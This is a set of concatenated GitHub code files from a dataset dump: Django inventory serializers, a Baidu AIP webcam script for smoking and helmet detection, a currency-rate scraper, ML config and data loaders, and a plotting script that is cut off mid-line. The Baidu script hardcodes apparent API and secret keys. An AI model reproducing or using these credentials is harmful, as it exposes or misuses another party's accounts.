'expected_quantity', 'counted_quantity',)\n\n\nclass StockInlineValidationSerializer(serializers.ModelSerializer):\n eggProductStockInLines = EggProductStockInlineValidationSerializer(many=True)\n wastageInLines = WastageInlineValidationSerializer(many=True, required=False)\n stock_note = serializers.CharField(required=False)\n qc_entry = QCEntryValidationSerializer(required=False)\n\n class Meta:\n model = StockInline\n fields = ('baseProduct', 'eggProductStockInLines', 'stock_note', 'wastageInLines', 'qc_entry')\n\n def validate(self, data):\n context = self.context\n stock_type = context.get('stock_type')\n eggProductStockInLines = data.get('eggProductStockInLines', None)\n if eggProductStockInLines is None:\n raise serializers.ValidationError(\"Egg Product Stock In Lines can not be empty\")\n if len(eggProductStockInLines) < 1:\n raise serializers.ValidationError(\"Egg Product Stock In Lines can not be empty\")\n else:\n if stock_type == \"receive\":\n wastageInLines = data.get('wastageInLines', None)\n if wastageInLines is None:\n raise serializers.ValidationError(\"Wastage In Lines can not be empty\")\n if len(wastageInLines) < 1:\n raise serializers.ValidationError(\"Wastage In Lines can not be empty\")\n if stock_type == \"qc_done\":\n wastageInLines = data.get('wastageInLines', None)\n if wastageInLines is None:\n raise serializers.ValidationError(\"Wastage In Lines can not be empty\")\n if len(wastageInLines) < 1:\n raise serializers.ValidationError(\"Wastage In Lines can not be empty\")\n qc_entry = data.get('qc_entry', None)\n if qc_entry is None:\n raise serializers.ValidationError(\"Qc Entry required\")\n return data\n\n\nclass StockPickUpValidationSerializer(serializers.ModelSerializer):\n class Meta:\n model = Stock\n fields = ('farm', 'productDivision')\n\n\nclass WastageValidationSerializer(serializers.ModelSerializer):\n class Meta:\n model = Wastage\n fields = ('stock_inline', 'wastage_type', 'name', 'expected_quantity', 'counted_quantity', 'wastage_remark')\n\n def validate(self, data):\n request = self.context.get('request')\n stock_id = request.data.get('stock_id')\n stock_inline = data.get('stock_inline')\n stockInline = StockInline.objects.filter(stock__id=stock_id, id=stock_inline.id).first()\n if stockInline:\n wastages = Wastage.objects.filter(stock_inline=stock_inline)\n if wastages.count() > 0:\n raise serializers.ValidationError(\"Already wastage added\")\n else:\n return data\n else:\n raise serializers.ValidationError(\"Stock In line mismatch\")\n\n\nclass EggProductStockInlineSerializer(serializers.ModelSerializer):\n class Meta:\n model = EggProductStockInline\n fields = ('id', 'stock_inline', 'name', 'desc', 'sku_type', 'quantity')\n\n\nclass StockInlineSerializer(serializers.ModelSerializer):\n eggProductStockInline = serializers.SerializerMethodField()\n baseProduct_name = serializers.SerializerMethodField()\n total_quantity = serializers.SerializerMethodField()\n\n class Meta:\n model = StockInline\n fields = ('baseProduct', 'baseProduct_name', 'stock', 'stock_note', 'eggProductStockInline', 'total_quantity')\n\n def get_eggProductStockInline(self, obj):\n eggProductStockInlines = obj.product_type_stock_inline.all()\n return EggProductStockInlineSerializer(eggProductStockInlines, many=True).data\n\n def get_baseProduct_name(self, obj):\n return obj.baseProduct.name\n\n def get_products(self, obj):\n return \"hello\"\n\n def get_total_quantity(self, obj):\n total_quantity = 0\n eggProductStockInlines = obj.product_type_stock_inline.all()\n for EPSI in eggProductStockInlines:\n if EPSI.sku_type == \"Full\":\n total_quantity = total_quantity + EPSI.quantity * 30\n else:\n total_quantity = total_quantity + EPSI.quantity\n return str(total_quantity) + \" \" + obj.baseProduct.description\n\n\nclass StockSerializer(serializers.ModelSerializer):\n stockInline = serializers.SerializerMethodField()\n farm_name = serializers.SerializerMethodField()\n warehouse_name = serializers.SerializerMethodField()\n warehousePerson_name = serializers.SerializerMethodField()\n operationsPerson_name = serializers.SerializerMethodField()\n supplyPerson_name = serializers.SerializerMethodField()\n driver_name = serializers.SerializerMethodField()\n vehicle_no = serializers.SerializerMethodField()\n total_quantity = serializers.SerializerMethodField()\n total_products = serializers.SerializerMethodField()\n\n class Meta:\n model = Stock\n fields = (\n 'id', 'batch_id', 'warehouse', 'warehouse_name', 'farm', 'farm_name', 'is_forwarded', 'supplyPerson',\n 'supplyPerson_name',\n 'warehousePerson',\n 'warehousePerson_name', 'operationsPerson', 'operationsPerson_name', 'driver', 'driver_name',\n 'vehicle', 'vehicle_no', 'productDivision', 'from_source', 'to_destination', 'stock_status', 'stockInline',\n 'received_at',\n 'picked_at', 'qc_done_at', 'total_quantity', 'total_products')\n\n def get_stockInline(self, obj):\n stockInlines = obj.stock_inline.all()\n return StockInlineSerializer(stockInlines, many=True).data\n\n def get_warehouse_name(self, obj):\n name = None\n if obj.warehouse:\n name = obj.warehouse.name\n return name\n\n def get_farm_name(self, obj):\n name = None\n if obj.farm:\n name = obj.farm.farm_name\n return name\n\n def get_warehousePerson_name(self, obj):\n name = None\n if obj.warehousePerson:\n name = obj.warehousePerson.user.name\n return name\n\n def get_supplyPerson_name(self, obj):\n name = None\n if obj.supplyPerson:\n name = obj.supplyPerson.user.name\n return name\n\n def get_operationsPerson_name(self, obj):\n name = None\n if obj.operationsPerson:\n name = obj.operationsPerson.user.name\n return name\n\n def get_driver_name(self, obj):\n name = None\n if obj.driver:\n name = obj.driver.driver_name\n return name\n\n def get_vehicle_no(self, obj):\n number = None\n if obj.vehicle:\n number = obj.vehicle.vehicle_no\n return number\n\n def get_total_quantity(self, obj):\n stockInlines = obj.stock_inline.all()\n data = StockInlineSerializer(stockInlines, many=True).data\n quantity = []\n for item in data:\n quantity.append(item['total_quantity'])\n return ' , '.join(quantity)\n\n def get_total_products(self, obj):\n stockInlines = obj.stock_inline.all()\n data = StockInlineSerializer(stockInlines, many=True).data\n product = []\n for item in data:\n product.append(item['baseProduct_name'])\n return ' , '.join(product)\n\n\nclass WarehouseSerializer(serializers.ModelSerializer):\n class Meta:\n model = Warehouse\n fields = '__all__'\n\n\nclass WarehouseEmployeeSerializer(serializers.ModelSerializer):\n class Meta:\n model = WarehousePersonProfile\n fields = '__all__'\n\n\nclass InventoryUpdateSerializer(serializers.ModelSerializer):\n branded_quantity = serializers.IntegerField(required=True)\n unbranded_quantity = serializers.IntegerField(required=True)\n\n class Meta:\n model = Inventory\n fields = ('warehouse', 'name', 'branded_quantity', 'unbranded_quantity','chatki_quantity')\n\n\nclass PackedInventoryUpdateSerializer(serializers.ModelSerializer):\n quantity = serializers.IntegerField(required=True)\n\n class Meta:\n model = PackedInventory\n fields = ('warehouse', 'name', 'quantity')\n\n\nclass DailyPaymentLineSerializer(serializers.ModelSerializer):\n class Meta:\n model = DailyPaymentLine\n fields = '__all__'\n\n\nclass DailyPaymentsSerializer(serializers.ModelSerializer):\n payment_lines = serializers.SerializerMethodField()\n salesPersonName = serializers.SerializerMethodField()\n time = serializers.CharField(required=False)\n\n class Meta:\n model = DailyPayments\n fields = ('warehouse', 'payment_lines','salesPersonName', 'date', 'time', 'salesPerson', 'remark', 'total_amount', 'is_verified')\n\n def get_time(self, obj):\n return self.time\n\n def get_salesPersonName(self, obj):\n if obj.salesPerson:\n return obj.salesPerson.user.name\n \n def get_payment_lines(self, obj):\n paymentInlines = obj.daily_payment_lines.all()\n return DailyPaymentLineSerializer(paymentInlines, many=True).data\n\n\nclass ExpenseRequestSerializer(serializers.ModelSerializer):\n class Meta:\n model = ExpenseRequest\n fields = '__all__'\n\n\n\nclass BankDetailsSerializer(serializers.ModelSerializer):\n class Meta:\n model = BankDetails\n fields = '__all__'\n\n\n\nclass BankDepositSerializer(serializers.ModelSerializer):\n class Meta:\n model = BankTransaction\n fields = '__all__'\n\n\nclass ExpenseCategorySerializer(serializers.ModelSerializer):\n class Meta:\n model = ExpenseCategory\n fields = '__all__'\n\n\nclass ExpenseSerializer(serializers.ModelSerializer):\n userName = serializers.SerializerMethodField()\n expenseCategory = serializers.SerializerMethodField()\n\n class Meta:\n model = Expense\n fields = '__all__'\n\n def get_time(self, obj):\n return self.date_time\n\n def get_userName(self, obj):\n if obj.user:\n return obj.user.name\n\n def get_expenseCategory(self, obj):\n if obj.expense_category:\n return obj.expense_category.name","repo_name":"aayushdocplix/eggozteqtis","sub_path":"warehouse/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":15342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28890418326","text":"# coding=utf-8\r\n\r\nfrom aip import AipBodyAnalysis\r\nimport cv2\r\nimport os\r\nimport base64,requests\r\nimport json\r\n# 获取吸烟检测的access_token\r\ndef getDetectXiyantoken():\r\n App_id=17363741\r\n APIkey=\"tAdrW89HdlWt1oG59xGTQ4V1\"\r\n SecretKey=\"6nt07LPLynaa2qLUGai6mtpDj7USnYkB\"\r\n# client_id 为官网获取的AK, client_secret 为官网获取的SK\r\n host = 'https://aip.baidubce.com/oauth/2.0/token?grant_type=client_credentials&client_id='+APIkey+'&client_secret='+SecretKey\r\n response = requests.get(host)\r\n if response:\r\n print(response.json()[\"access_token\"])\r\n return response.json()[\"access_token\"]\r\ntoken=getDetectXiyantoken()\r\n# \"\"\" 你的 APPID AK SK \"\"\"\r\nAPP_ID = '17245297'\r\nAPI_KEY = 'rYu3mEhrFnWBUI8ILj9j4c1k'\r\nSECRET_KEY = 'DjTIIk86Kzg60tarp60h2WZkjpTUPQOR'\r\n\r\nclient = AipBodyAnalysis(APP_ID, API_KEY, SECRET_KEY)\r\n\r\n\"\"\" 读取图片 \"\"\"\r\ndef get_file_content(filePath):\r\n with open(filePath, 'rb') as fp:\r\n return fp.read()\r\n\r\ndef deleteByNum():\r\n \"\"\"删除temp里的文件\"\"\"\r\n dirpath=\"D:/Project/aip-python/temp/\"\r\n files = os.listdir(dirpath) # 列出目录下的文件\r\n for file in files:\r\n os.remove(dirpath+file) # 删除文件\r\n return\r\n\r\ndef detecetxiyan(image):\r\n request_url = \"\thttps://aip.baidubce.com/rpc/2.0/ai_custom/v1/detection/xiyan\"\r\n data = {'image': base64.b64encode(image).decode()}\r\n access_token = token\r\n request_url = request_url + \"?access_token=\" + access_token\r\n response = requests.post(request_url, data=json.dumps(data))\r\n content = response.json()\r\n return content\r\n\r\nvideo_path = \"D:/Project/xiyanSusai.mp4\"\r\n# image_path=\"D:/Project/xiyan2.jpg\"\r\ncap = cv2.VideoCapture(0)\r\nprint(cap.isOpened())\r\nframe_count = 1\r\nnum=1\r\nsuccess = True\r\ntext=[]\r\ntext2=\"\"\r\nfilenum=1\r\nlocation=[]\r\nlocationXiYan=[]\r\ncount=0\r\nwhile (success):\r\n text1=\"\"\r\n success, frame = cap.read()\r\n cv2.imshow('frame', frame) # 显示图像帧\r\n # print('Read a new frame: ', success)\r\n params = []\r\n # params.append(cv.CV_IMWRITE_PXM_BINARY)\r\n params.append(1)\r\n if frame_count % 30 == 0:\r\n filenum += 1\r\n cv2.imwrite(\"D:/Project/aip-python/temp/video\" + \"_%d.jpg\" % num, frame, params)\r\n\r\n image_path = (\"D:/Project/aip-python/temp/video\" + \"_%d.jpg\" % num)\r\n # image2 = cv2.imread(imagepath)\r\n # cv2.imshow(\"test\", image2)\r\n\r\n image = get_file_content(image_path)\r\n\r\n \"\"\" 如果有可选参数 \"\"\"\r\n options = {}\r\n options[\"type\"] = \"headwear\"\r\n\r\n \"\"\" 带参数调用人体检测与属性识别 \"\"\"\r\n resultOption = client.bodyAttr(image, options)\r\n resultXiyan=detecetxiyan(image)\r\n print(resultOption)\r\n print(resultXiyan)\r\n print(\"===============================================\")\r\n\r\n if resultOption['person_info'][0][\"attributes\"]!=\"\":\r\n for x in resultOption['person_info']:\r\n text.append(x[\"attributes\"][\"headwear\"][\"name\"])\r\n height = x[\"location\"][\"height\"]\r\n width = x[\"location\"][\"width\"]\r\n top = x[\"location\"][\"top\"]\r\n left = x[\"location\"][\"left\"]\r\n loc = [height, width, top, left]\r\n location.append(loc)\r\n print(location)\r\n\r\n if resultXiyan[\"results\"]!=\"\":\r\n for x in resultXiyan[\"results\"]:\r\n text2=\"XiYan\"\r\n height = x[\"location\"][\"height\"]\r\n width = x[\"location\"][\"width\"]\r\n top = x[\"location\"][\"top\"]\r\n left = x[\"location\"][\"left\"]\r\n loc = [height, width, top, left]\r\n locationXiYan.append(loc)\r\n print(locationXiYan)\r\n for i in text:\r\n if i==\"无帽\":\r\n text1=\"Unwear Helmet\"\r\n\r\n if text1==\"Unwear Helmet\":\r\n image2 = cv2.imread(image_path)\r\n for i in location:\r\n height=i[0]\r\n width=i[1]\r\n top=i[2]\r\n left=i[3]\r\n cv2.rectangle(image2, (left, top), (left + width, top + height), (0, 255, 0), 2)\r\n cv2.putText(image2, text1, (400, 40), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 1, cv2.LINE_AA)\r\n cv2.imwrite(\"D:/Project/aip-python/UnwearHelmet/video\" + \"_%d.jpg\" % num, image2, params)\r\n cv2.imshow(\"test2\", image2)\r\n\r\n if text2==\"XiYan\":\r\n image3 = cv2.imread(image_path)\r\n for i in location:\r\n height=i[0]\r\n width=i[1]\r\n top=i[2]\r\n left=i[3]\r\n cv2.rectangle(image3, (left, top), (left + width, top + height), (0, 255, 0), 2)\r\n cv2.putText(image3, text2, (400, 40), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 1, cv2.LINE_AA)\r\n cv2.imwrite(\"D:/Project/aip-python/XiYan/video\" + \"_%d.jpg\" % num, image3, params)\r\n cv2.imshow(\"test\", image3)\r\n\r\n\r\n num+=1\r\n\r\n\r\n if filenum>20:\r\n print(filenum)\r\n deleteByNum()\r\n print( \"Temp files deleted\")\r\n filenum=1\r\n\r\n frame_count = frame_count + 1\r\n location=[]\r\n locationXiYan=[]\r\n\r\n\r\n if cv2.waitKey(20) & 0xFF == ord('q'): # 每隔20ms采集一帧,按q键退出采集\r\n break\r\n\r\ncap.release()\r\n\r\n\r\n\r\n# imagepath=\"D:/Project/34.jpg\"\r\n# image = get_file_content(imagepath)\r\n#\r\n# \"\"\" 调用人体检测与属性识别 \"\"\"\r\n# resultAll=client.bodyAttr(image)\r\n#\r\n# \"\"\" 如果有可选参数 \"\"\"\r\n# options = {}\r\n# options[\"type\"] = \"gender,smoke,headwear\"\r\n#\r\n# \"\"\" 带参数调用人体检测与属性识别 \"\"\"\r\n# resultOption=client.bodyAttr(image, options)\r\n\r\n# a=client.bodyAttr(image, options)\r\n# text=a[\"person_info\"][0][\"attributes\"][\"smoke\"][\"name\"]\r\n# height=a[\"person_info\"][0][\"location\"][\"height\"]\r\n# width=a[\"person_info\"][0][\"location\"][\"width\"]\r\n# top=a[\"person_info\"][0][\"location\"][\"top\"]\r\n# left=a[\"person_info\"][0][\"location\"][\"left\"]\r\n# if text==\"未吸烟\":\r\n# text=\"Unsmoke\"\r\n\r\n\r\n# print(resultOption)\r\n# print(\"===============================================\")\r\n# print(a[\"person_info\"][0][\"attributes\"][\"smoke\"][\"name\"])\r\n# \"'height': 466, 'width': 178, 'top': 58, 'score': 0.9998472929000854, 'left': 309}\"\r\n#\r\n\r\n# #画矩形和添加文字\r\n# image2 = cv2.imread(imagepath)\r\n# cv2.rectangle(image2, (left, top), (left + width, top + height), (0, 255, 0), 2)\r\n# # cv2.imwrite('2.jpg', image2)\r\n# cv2.putText(image2,text, (409,38), cv2.FONT_HERSHEY_SIMPLEX,0.7,(0,0,255), 1, cv2.LINE_AA)\r\n# while(1):\r\n# cv2.imshow(\"test\",image2)\r\n# if cv2.waitKey(20) & 0xFF == ord('q'): # 每隔20ms采集一帧,按q键退出采集\r\n# break","repo_name":"2Fzzzzz/aip","sub_path":"AipBodyAnalysis.py","file_name":"AipBodyAnalysis.py","file_ext":"py","file_size_in_byte":6715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16401278105","text":"import requests\n\n\n\nclass Publisher:\n def __init__(self):\n self.address = 'http://127.0.0.1:8080/message'\n self.headers = {\"Content-Type\": \"application/json\"}\n self.json = dict()\n\n def post_message(self, message, topic) -> bool:\n self.json['message'] = message\n self.json['topic'] = topic\n resp = requests.post(self.address, headers=self.headers, json=self.json)\n resp_json = resp.json()\n if resp_json['status'] == 'ok':\n return True\n elif resp_json['status'] == 'fail':\n return False\n\n\npub = Publisher()\npub.post_message(\"HOLAS\", \"architecture\")","repo_name":"grobereiner/software-final","sub_path":"CLIENTS/publisher.py","file_name":"publisher.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74673902544","text":"\"\"\"src views.\"\"\"\nfrom django.views.generic import TemplateView\n\nfrom app import services\n\n\n\nclass IndexView(TemplateView):\n\n template_name = 'index.html'\n\n\nclass DetailView(TemplateView):\n\n template_name = 'detail.html'\n\n\nclass ArticleDetailView(TemplateView):\n \"\"\"Article detail view.\"\"\"\n\n view_name = 'article_detail'\n\n template_name = 'app/article_detail.html'\n\n def get_context_data(self, uid, **kwargs):\n context = super().get_context_data(**kwargs)\n\n dataset = {\n 'article': services.get_article_object(uid)\n }\n context.update(dataset)\n return context\n","repo_name":"istommao/pyblog","sub_path":"src/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17271969304","text":"import os\nimport shutil\nimport shutil\nfrom config import *\nimport sys\n\n\nclass DirInit(object):\n\n def __init__(self, directory=None):\n path = os.popen(\"pwd\").read().strip()\n self.path = directory if directory is not None else path\n\n self.res_path = self.path + \"/res\"\n self.inout_path = self.path + \"/inout\"\n\n def initialize(self):\n self.create_dir_if_needed(self.inout_path)\n self.create_dir_if_needed(self.res_path)\n self.copy_sample_yaml()\n\n def create_dir_if_needed(self, dir):\n if os.path.exists(dir):\n warn(\"Skipped path already exists %s\" % dir)\n else:\n os.mkdir(dir)\n info(\"Created directory at %s\" % dir)\n\n def copy_sample_yaml(self):\n path = self.path_to_sample()\n dest_path = self.inout_path + \"/sample.yml\"\n\n if os.path.exists(dest_path):\n warn(\"Skipped sample yaml already exists %s\" % dest_path)\n else:\n shutil.copyfile(path, dest_path)\n info(\"Created sample yaml at %s\" % dest_path)\n\n def path_to_sample(self):\n path = os.path.join(os.path.dirname(__file__), \"../data\")\n\n absolute_path = getattr(sys, \"_MEIPASS\", path) + \"/sample.yml\"\n return absolute_path\n\n def clear(self):\n shutil.rmtree(self.path)\n","repo_name":"nsomar/mockpy","sub_path":"mockpy/utils/dir_init.py","file_name":"dir_init.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":139,"dataset":"github-code","pt":"48"} +{"seq_id":"24949035706","text":"from __future__ import division\nfrom __future__ import print_function\nfrom pickle import FALSE\n\n'''\nThis file contains the default values for experiments of text classification\n'''\nimport numpy as np\nfrom easydict import EasyDict as edict\n\n\n__C = edict()\ncfg = __C\n\n# Dataset name: functional_conditions, health_conditions, observations\n__C.DATASET_NAME = 'functional_conditions'\n__C.CONFIG_NAME = ''\n__C.DATA_DIR = ''\n__C.OUTPUT_DIR = ''\n__C.GPU_ID = 0\n__C.CUDA = True\n__C.WORKERS = 4\n__C.STD_VALIDATION = False # using standard data for validation\n__C.VIS_DATA = True # loading data from visitors\n__C.AUG_DATA_NAME = ''\n__C.EMBEDDING_DATA_NAME = ''\n__C.EMBEDDING_DIR = ''\n__C.EMBEDDING_AUG = False\n__C.LABEL_ENC_NAME = ''\n\n\n\n# Training options\n__C.TRAIN = edict()\n__C.TRAIN.FLAG = True\n__C.TRAIN.MAX_EPOCH = 10000\n__C.TRAIN.LR = 0.1\n__C.TRAIN.GAMMA = 0.0\n__C.TRAIN.EARLY_STOPPING = 10\n__C.TRAIN.CLASSIFIER = 'XGBOOST'\n__C.TRAIN.TEST_RATE = 0\n__C.TRAIN.MODEL = ''\n__C.TRAIN.USE_TRANSFER = False\n__C.TRAIN.TRANSFER_TYPE = 1\n__C.TRAIN.MODEL = '' # load saved trained model\n__C.TRAIN.BATCH_SIZE = 128\n__C.TRAIN.TEST_NUM = 0\n\n\n\n\n__C.TEXT = edict()\n__C.TEXT.EMBEDDING_MODEL = '' # 'LASER', 'LaSBE' , ...\n__C.TEXT.MULTILINGUAL_TYPE = ''\n\n\n\ndef _merge_a_into_b(a, b):\n \"\"\"Merge config dictionary a into config dictionary b, clobbering the\n options in b whenever they are also specified in a.\n \"\"\"\n \n if type(a) is not edict:\n return\n\n for k, v in a.items():\n # a must specify keys that are in b\n if k not in b: # b.has_key(k):\n raise KeyError('{} is not a valid config key'.format(k))\n\n # the types must match, too\n old_type = type(b[k])\n if old_type is not type(v):\n if isinstance(b[k], np.ndarray):\n v = np.array(v, dtype=b[k].dtype)\n else:\n raise ValueError(('Type mismatch ({} vs. {}) '\n 'for config key: {}').format(type(b[k]),\n type(v), k))\n\n # recursively merge dicts\n if type(v) is edict:\n try:\n _merge_a_into_b(a[k], b[k])\n except:\n print('Error under config key: {}'.format(k))\n raise\n else:\n b[k] = v\n\n\ndef cfg_from_file(filename):\n \"\"\"Load a config file and merge it into the default options.\"\"\"\n import yaml\n with open(filename, 'r') as f:\n yaml_cfg = edict(yaml.load(f , Loader=yaml.FullLoader))\n\n _merge_a_into_b(yaml_cfg, __C)","repo_name":"SystematicGroup/thisted_observation_classification","sub_path":"observation_classifier/models/observation_classification/miscc/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71204515346","text":"import urllib.request as req # 建立連線\nimport bs4\nimport pandas as pd\n\n\"\"\"\nmethod I. 抓table還是用pandas比較容易\n\"\"\"\n\nurl = \"https://rate.bot.com.tw/xrt\"\ndfs = pd.read_html(url)\nprint(dfs[0]) # 表格部分都會存放於[0] # 最簡單也最快\n\n\"\"\"\nmethod II. 依照格子去抓,比較麻煩\n\"\"\"\n\nrequest = req.Request(url, headers={\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36\"\n})\nwith req.urlopen(request) as response:\n data = response.read().decode(\"utf-8\")\n\nroot = bs4.BeautifulSoup(data, \"html.parser\") # 用bs4協助整理html格式資訊\ncash_name = root.find_all('div', {'class': \"visible-phone print_hide\"})\nform = root.find_all('td', {'class': 'text-right display_none_print_show print_width',\n 'data-table': [\"本行現金買入\", \"本行現金賣出\", \"本行即期買入\", \"本行即期賣出\"]}) # 抓td 比較麻煩\nfor i in range(len(cash_name)):\n print(cash_name[i].text.strip())\n print(\"本行現金買入\", form[i * 4].text)\n print(\"本行現金賣出\", form[i * 4 + 1].text)\n print(\"本行即期買入\", form[i * 4 + 2].text)\n print(\"本行即期賣出\", form[i * 4 + 3].text)","repo_name":"AshengLin/WebCrawler","sub_path":"Crawer_form.py","file_name":"Crawer_form.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7077756943","text":"import torch\nimport torchvision\nimport torchvision.transforms as transforms\nfrom PIL import ImageTk, Image\ntransform = transforms.Compose(\n [\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.5, 0.5, 0.5], std=[0.5, 0.5, 0.5]),\n ]\n)\n\n\ndef transform_invert(img_, transform_train):\n \"\"\"\n 将data 进行反transfrom操作\n :param img_: tensor\n :param transform_train: torchvision.transforms\n :return: PIL image\n \"\"\"\n if 'Normalize' in str(transform_train):\n norm_transform = list(filter(lambda x: isinstance(x, transforms.Normalize), transform_train.transforms))\n mean = torch.tensor(norm_transform[0].mean, dtype=img_.dtype, device=img_.device)\n std = torch.tensor(norm_transform[0].std, dtype=img_.dtype, device=img_.device)\n img_.mul_(std[:, None, None]).add_(mean[:, None, None])\n\n img_ = img_.transpose(0, 2).transpose(0, 1) # C*H*W --> H*W*C\n if 'ToTensor' in str(transform_train) or img_.max() < 1:\n img_ = img_.detach().numpy() * 255\n\n if img_.shape[2] == 3:\n img_ = Image.fromarray(img_.astype('uint8')).convert('RGB')\n elif img_.shape[2] == 1:\n img_ = Image.fromarray(img_.astype('uint8').squeeze())\n else:\n raise Exception(\"Invalid img shape, expected 1 or 3 in axis 2, but got {}!\".format(img_.shape[2]))\n\n return img_\n\n\ndef loading():\n trainset = torchvision.datasets.CIFAR10(root='../Dataset/data', train=True, download=False, transform=transform)\n testset = torchvision.datasets.CIFAR10(root='../Dataset/data', train=False, download=False, transform=transform)\n\n trianloader = torch.utils.data.DataLoader(trainset, batch_size=1024, shuffle=True, num_workers=2)\n testloader = torch.utils.data.DataLoader(testset, batch_size=1024, shuffle=False, num_workers=2)\n\n return trianloader, testloader\n\n\nif __name__ == '__main__':\n trainloader, testloader = loading()\n for i, data in enumerate(trainloader, 0):\n a, b = data\n print(a.shape[0])\n exit(0)\n","repo_name":"Zhou-CyberSecurity-AI/DAPter","sub_path":"Code/get_dataset.py","file_name":"get_dataset.py","file_ext":"py","file_size_in_byte":2016,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"42393629133","text":"#!/usr/bin/env python\n\n################################### visualize_attention.py ####################################\n# PURPOSE: \n# EDIT TO: \n# -------------------------------------------Summary-------------------------------------------\n# \n###############################################################################################\n\n\nimport dgl\nimport torch as th\nimport os,sys,math,glob,ROOT\nfrom ROOT import TH1D, TCanvas, TProfile\nimport numpy as np\nimport argparse\n\nfrom plot_functions import *\nfrom GNN_eval import *\n\n#set ATLAS style for plots\ngROOT.LoadMacro(\"/global/homes/j/jmw464/ATLAS/Vertex-GNN/scripts/include/AtlasStyle.C\")\ngROOT.LoadMacro(\"/global/homes/j/jmw464/ATLAS/Vertex-GNN/scripts/include/AtlasLabels.C\")\nfrom ROOT import SetAtlasStyle\n\n\ndef main(argv):\n gROOT.SetBatch(True)\n\n #parse command line arguments\n parser = argparse.ArgumentParser(add_help=False)\n parser.add_argument(\"-r\", \"--runnumber\", type=str, default=0, dest=\"runnumber\", help=\"unique identifier for current run\")\n parser.add_argument(\"-d\", \"--data_dir\", type=str, required=True, dest=\"data_dir\", help=\"name of directory where data is stored\")\n parser.add_argument(\"-o\", \"--output_dir\", type=str, required=True, dest=\"output_dir\", help=\"name of directory where GNN output is stored\")\n parser.add_argument(\"-s\", \"--dataset\", type=str, required=True, dest=\"infile_name\", help=\"name of dataset to train on (without hdf5 extension)\")\n parser.add_argument(\"-f\", \"--options\", type=str, required=True, dest=\"option_file\", help=\"name of file containing script options\")\n args = parser.parse_args()\n\n runnumber = args.runnumber\n infile_name = args.infile_name\n infile_path = args.data_dir\n outfile_path = args.output_dir\n option_file = args.option_file\n\n options = __import__(option_file, globals(), locals(), [], 0)\n\n #import options from option file\n batch_size = options.batch_size\n track_pt_bound = options.track_pt_bound\n track_d0_bound = options.track_d0_bound\n track_z0_bound = options.track_z0_bound\n jet_pt_bound = options.jet_pt_bound\n jet_eta_bound = options.jet_eta_bound\n ntrk_bound = options.ntrk_bound\n bin_threshold = options.bin_threshold\n mult_threshold = options.mult_threshold\n cut_string = options.cut_string\n\n graphfile_name = outfile_path+runnumber+\"/\"+infile_name+\"_\"+runnumber+\"_results.bin\"\n paramfile_name = infile_path+infile_name+\"_params\"\n outfile_name = outfile_path+runnumber+\"/\"+infile_name+\"_\"+runnumber\n\n #calculate number of features in graphs\n sample_graph = (dgl.load_graphs(graphfile_name, [0]))[0][0]\n incl_errors = incl_corr = incl_hits = incl_vweight = False\n nnfeatures_base = sample_graph.ndata['features_base'].size()[1]\n nnfeatures = nnfeatures_base\n if 'features_vweight' in sample_graph.ndata.keys():\n nnfeatures_vweight = sample_graph.ndata['features_vweight'].size()[1]\n incl_vweight = True\n nnfeatures += nnfeatures_vweight\n if 'features_errors' in sample_graph.ndata.keys():\n nnfeatures_errors = sample_graph.ndata['features_errors'].size()[1]\n incl_errors = True\n nnfeatures += nnfeatures_errors\n if 'features_hits' in sample_graph.ndata.keys():\n nnfeatures_hits = sample_graph.ndata['features_hits'].size()[1]\n incl_hits = True\n nnfeatures += nnfeatures_hits\n if 'features_corr' in sample_graph.ndata.keys():\n nnfeatures_corr = sample_graph.ndata['features_corr'].size()[1]\n incl_corr = True\n nnfeatures += nnfeatures_corr\n \n #find how many attention layers the network has\n nattn = 0\n for key in sample_graph.edata.keys():\n if 'attn' in key:\n nattn += 1\n\n #find how many heads each attention layer has\n nheads = []\n for i in range(nattn):\n nheads.append(sample_graph.edata['attn'+str(i+1)].shape[1])\n\n profile_attn_true = []\n profile_attn_pred = []\n hist_attn_b = []\n hist_attn_c = []\n hist_attn_none = []\n profile_attn_pt_b = []\n profile_attn_pt_c = []\n profile_attn_pt_none = []\n profile_attn_d0_b = []\n profile_attn_d0_c = []\n profile_attn_d0_none = []\n profile_attn_z0_b = []\n profile_attn_z0_c = []\n profile_attn_z0_none = []\n\n for i in range(nattn):\n for j in range(nheads[i]):\n profile_attn_true.append(TProfile(\"edg_attn\"+str(i+1)+str(j+1)+\"_true\", \";#alpha_{\"+str(i+1)+\",\"+str(j+1)+\"};Average edge score\", 20, 0, 1))\n profile_attn_pred.append(TProfile(\"edg_attn\"+str(i+1)+str(j+1)+\"_pred\", \";#alpha_{\"+str(i+1)+\",\"+str(j+1)+\"};Average edge score\", 20, 0, 1))\n hist_attn_b.append(TH1D(\"edg_attn\"+str(i+1)+str(j+1)+\"_b\", \";#alpha_{\"+str(i+1)+\",\"+str(j+1)+\"};Normalized count\", 20, 0, 1))\n hist_attn_c.append(TH1D(\"edg_attn\"+str(i+1)+str(j+1)+\"_c\", \";#alpha_{\"+str(i+1)+\",\"+str(j+1)+\"};Normalized count\", 20, 0, 1))\n hist_attn_none.append(TH1D(\"edg_attn\"+str(i+1)+str(j+1)+\"_none\", 